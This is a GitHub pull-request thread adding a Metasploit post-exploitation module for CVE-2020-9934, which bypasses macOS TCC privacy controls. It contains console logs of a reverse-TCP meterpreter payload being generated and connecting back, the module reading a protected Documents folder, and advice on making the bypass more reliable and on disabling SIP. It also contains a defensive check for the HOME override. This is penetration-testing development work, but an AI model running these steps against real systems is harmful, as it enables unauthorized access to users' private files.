
Add module for CVE-2020-9934 #13942

Merged
merged 5 commits into from
Sep 11, 2020

@timwr (Contributor) commented Aug 5, 2020

Add a quick module for CVE-2020-9934, ping @mattshockl

Verification

  • Get a session on OSX 10.15.5 (or lower)
  • Run the module:
      use post/osx/escalate/tccbypass
      set SESSION 1
      run
  • Verify you can now access the Documents folder:
msf5 post(osx/escalate/tccbypass) > sessions

Active sessions
===============

  Id  Name  Type                 Information                                                                       Connection
  --  ----  ----                 -----------                                                                       ----------
  1         meterpreter x64/osx  user @ Users-MacBook-Pro.local (uid=501, gid=20, euid=501, egid=20) @ Users-M...  192.168.56.1:4444 -> 192.168.56.3:49166 (192.168.56.3)

msf5 post(osx/escalate/tccbypass) > sessions -C "ls Documents"
[*] Running 'ls Documents' on meterpreter session 1 (192.168.56.3)
[-] stdapi_fs_ls: Operation failed: 1
msf5 post(osx/escalate/tccbypass) > run

[*] Creating TCC directory /tmp/.EhprHBDj/Library/Application Support/com.apple.TCC
[+] fake TCC DB found: /tmp/.EhprHBDj/Library/Application Support/com.apple.TCC/TCC.db
[+] TCC.db was successfully updated!
[*] To cleanup, run:
launchctl unsetenv HOME && launchctl stop com.apple.tccd && launchctl start com.apple.tccd
rm -rf /tmp/.EhprHBDj

[*] Post module execution completed
msf5 post(osx/escalate/tccbypass) > sessions -C "ls Documents"
[*] Running 'ls Documents' on meterpreter session 1 (192.168.56.3)
Listing: Documents
==================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  0     fil   2020-08-03 23:29:00 +0800  .localized
100644/rw-r--r--  0     fil   2020-08-05 13:14:16 +0800  lol

label-actions bot commented Aug 5, 2020

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

bwatters-r7 self-assigned this Aug 11, 2020

@bwatters-r7 (Contributor) commented Aug 14, 2020

Forgive my macOS ignorance, but I'm guessing when you say earlier than 10.15.5, you mean 10.15.0 - 10.15.14? I tried this on 10.14 and 10.13, but neither needed the module to access Documents?
I've been unable to coax/find a Catalina pre-10.15.6, so I'm pulling myself off this.

@bwatters-r7 (Contributor):
msf5 payload(osx/x64/meterpreter/reverse_tcp) > 
[*] Transmitting first stager...(210 bytes)
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (804084 bytes) to 192.168.132.178
[*] Meterpreter session 2 opened (192.168.135.197:4567 -> 192.168.132.178:49153) at 2020-08-14 15:27:47 -0500

msf5 payload(osx/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : msfusers-Mac.local
OS           : macOS Catalina (macOS 10.15.4)
Architecture : x86
BuildTuple   : x86_64-apple-darwin
Meterpreter  : x64/osx
meterpreter > getuid
Server username: msfuser @ msfusers-Mac.local (uid=501, gid=20, euid=501, egid=20)
meterpreter > ls Documents
[-] stdapi_fs_ls: Operation failed: 1
meterpreter > background
[*] Backgrounding session 2...
msf5 post(osx/escalate/tccbypass) > show options

Module options (post/osx/escalate/tccbypass):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf5 post(osx/escalate/tccbypass) > set session 2
session => 2
msf5 post(osx/escalate/tccbypass) > run

[*] Creating TCC directory /tmp/.FlOIUSGt/Library/Application Support/com.apple.TCC
[+] fake TCC DB found: /tmp/.FlOIUSGt/Library/Application Support/com.apple.TCC/TCC.db
[+] TCC.db was successfully updated!
[*] To cleanup, run:
launchctl unsetenv HOME && launchctl stop com.apple.tccd && launchctl start com.apple.tccd
rm -rf '/tmp/.FlOIUSGt'

[*] Post module execution completed
msf5 post(osx/escalate/tccbypass) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > ls Documents
Listing: Documents
==================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  0     fil   2020-08-14 13:51:29 -0500  .localized

meterpreter > 

@bwatters-r7 (Contributor):

@timwr, thoughts on @bcoles' changes?

@mattshockl:

Hey, just read over some of the code and it looks good! Here are just a few quick suggestions:

  • TCC is active even if the user is root (and the normal TCC.db is SIP-protected, so you can't modify it directly even as root), so I would suggest removing that fail-case
  • There's a race condition I was hitting pretty often in testing my PoC where the service launches but doesn't create the database immediately, so the database check might fail sometimes even if the target is actually vulnerable. However, since you're creating the fake TCC tmp directory anyway, I would suggest creating the database (just run sqlite3 on CREATE_DB in https://github.com/mattshockl/CVE-2020-9934/blob/master/BypassTCC.swift) BEFORE restarting the service. Therefore when TCCd restarts, it automatically sees the database you created and doesn't attempt to try and create a new one

And while TCC has been a part of macOS since Mountain Lion, it only started actively restricting file access in Catalina so versions pre-Catalina aren't vulnerable per se.

@timwr (Contributor, Author) commented Sep 9, 2020

Apologies for the delay on this! I was prioritizing #13992 because I thought it would supplant this PR, but I suspect it is still useful.

What was confusing for me was that even after adding 'kTCCServiceCamera', 'kTCCServiceMicrophone', 'kTCCServiceAll', 'kTCCServiceScreenCapture', etc permissions I still was unable to get, for example, screenshare to work without manually granting it permission.

@mattshockl:
So I looked into this recently, and while I haven't reversed all of tccd yet, there is actually a tccd instance (and corresponding TCC.db) per logged in user and also one system-wide. I don't know exactly where the delineation occurs, but it looks like some kTCCService entitlements are stored in the system-wide database at /Library/Application Support/com.apple.TCC/TCC.db and these include camera/microphone/screen capture, which unfortunately subverts this bug because we don't have access to change the environment variables in launchd for the system-wide daemon running as root.
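A defender-side check for the per-user redirection described in the comment above, added here as an example (it is not code from the PR or from the Metasploit module): it compares the HOME value visible to the user's launchd with the account's real home directory, assuming a clean launchd leaves HOME unset or equal to that directory, and flags a TCC.db path outside the per-user and system-wide locations the comment names. The function names (`tcc_home_override_suspicious`, `tcc_db_path_unexpected`, `audit_tcc_home`) are this example's own.

```shell
#!/bin/sh
# Added defender-side example, not part of the PR or the Metasploit module.
# CVE-2020-9934 redirects the per-user tccd to a fake TCC.db by overriding
# HOME in the user's launchd environment; these checks look for that state.

# Returns 0 (suspicious) when the launchd-level HOME is set and differs
# from the account's real home directory.
#   $1 = output of `launchctl getenv HOME` (empty when unset)
#   $2 = the account's real home directory
tcc_home_override_suspicious() {
    launchd_home=${1%/}   # drop a trailing slash before comparing
    real_home=${2%/}
    # Assumption: a clean launchd leaves HOME unset (the PR's cleanup line
    # simply unsets it), so an empty value is treated as not redirected.
    [ -n "$launchd_home" ] || return 1
    [ "$launchd_home" = "$real_home" ] && return 1
    return 0
}

# Returns 0 (unexpected) when a TCC.db path is neither the per-user database
# under the real home nor the system-wide one named in the comment above.
#   $1 = TCC.db path, $2 = the account's real home directory
tcc_db_path_unexpected() {
    real_home=${2%/}
    case "$1" in
        "$real_home/Library/Application Support/com.apple.TCC/TCC.db") return 1 ;;
        "/Library/Application Support/com.apple.TCC/TCC.db") return 1 ;;
    esac
    return 0
}

# Live check on a macOS host: reads the real home from Directory Services
# (assumes a path without spaces) and the launchd value via launchctl.
# Prints an ALERT line and returns 1 when the override is present.
audit_tcc_home() {
    user=${1:-$(id -un)}
    real_home=$(dscl . -read "/Users/$user" NFSHomeDirectory 2>/dev/null | awk '{print $2}')
    launchd_home=$(launchctl getenv HOME 2>/dev/null)
    if tcc_home_override_suspicious "$launchd_home" "$real_home"; then
        printf 'ALERT: launchd HOME for %s is %s, expected %s\n' \
            "$user" "$launchd_home" "$real_home"
        return 1
    fi
    printf 'OK: launchd HOME for %s is not redirected\n' "$user"
}

# Run the live check only when invoked as `sh tcc_home_audit.sh --audit [user]`.
if [ "${1:-}" = "--audit" ]; then audit_tcc_home "${2:-}"; fi
```

The live check only covers the per-user tccd; as the comment notes, the system-wide daemon runs as root with its own environment, so its database path is checked separately by `tcc_db_path_unexpected`.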

@timwr (Contributor, Author) commented Sep 9, 2020

Thanks @mattshockl, that makes a lot more sense now. Presumably if we disabled SIP, e.g. with exploit 6) from https://github.com/sslab-gatech/pwn2own2020, we could write into that db and grant ourselves the permission.

@mattshockl:

Yeah, with SIP disabled (and logged in as root) you should be able to write directly to the system-wide TCC.db and the currently logged-in user's TCC.db to get all of the entitlements.

@timwr (Contributor, Author) commented Sep 10, 2020

@bwatters-r7 fyi I think 10.15 -> 10.15.5 inclusive are vulnerable but I've only tested 10.15.3 and 10.15.4.
I think only 10.15.6 has the patch: https://support.apple.com/en-hk/HT211289

@bwatters-r7 (Contributor):
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use payload/osx/x64/meterpreter/reverse_tcp
msf6 payload(osx/x64/meterpreter/reverse_tcp) > set lhost 192.168.135.197
lhost => 192.168.135.197
msf6 payload(osx/x64/meterpreter/reverse_tcp) > set lport 4567
lport => 4567
msf6 payload(osx/x64/meterpreter/reverse_tcp) > generate -f macho -o revtcpx64.mac
[*] Writing 17204 bytes to revtcpx64.mac...
msf6 payload(osx/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 192.168.135.197:4567 
msf6 payload(osx/x64/meterpreter/reverse_tcp) > [*] Transmitting first stager...(210 bytes)
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (799916 bytes) to 192.168.132.178
[*] Meterpreter session 1 opened (192.168.135.197:4567 -> 192.168.132.178:49156) at 2020-09-10 11:44:05 -0500

msf6 payload(osx/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : msfusers-Mac.local
OS           : macOS Catalina (macOS 10.15.4)
Architecture : x86
BuildTuple   : x86_64-apple-darwin
Meterpreter  : x64/osx
meterpreter > getuid
Server username: msfuser @ msfusers-Mac.local (uid=501, gid=20, euid=501, egid=20)
meterpreter > ls Documents
[-] 1009: Operation failed: 1
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(osx/x64/meterpreter/reverse_tcp) > use post/osx/escalate/tccbypass 
msf6 post(osx/escalate/tccbypass) > show options

Module options (post/osx/escalate/tccbypass):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf6 post(osx/escalate/tccbypass) > set session 1
session => 1
msf6 post(osx/escalate/tccbypass) > set verbose true
verbose => true
msf6 post(osx/escalate/tccbypass) > run

[*] Creating TCC directory /tmp/.SZulaEVB/Library/Application Support/com.apple.TCC
[+] fake TCC DB found: /tmp/.SZulaEVB/Library/Application Support/com.apple.TCC/TCC.db
[+] TCC.db was successfully updated!
[*] To cleanup, run:
launchctl unsetenv HOME && launchctl stop com.apple.tccd && launchctl start com.apple.tccd
rm -rf '/tmp/.SZulaEVB'

[*] Post module execution completed
msf6 post(osx/escalate/tccbypass) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: msfuser @ msfusers-Mac.local (uid=501, gid=20, euid=501, egid=20)
meterpreter > ls Documents 
Listing: Documents
==================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  0     fil   2020-08-14 13:51:29 -0500  .localized

meterpreter > 

timwr removed the needs-docs label Sep 11, 2020
bwatters-r7 merged commit f248f20 into rapid7:master Sep 11, 2020

@bwatters-r7 (Contributor) commented Sep 11, 2020

Release Notes

New module post/osx/escalate/tccbypass leverages CVE-2020-9934 to allow a session to bypass the macOS Transparency, Consent, and Control (TCC) Framework for unauthorized access to sensitive user data.

pbarry-r7 added the rn-modules (release notes for new or majorly enhanced modules) label Sep 29, 2020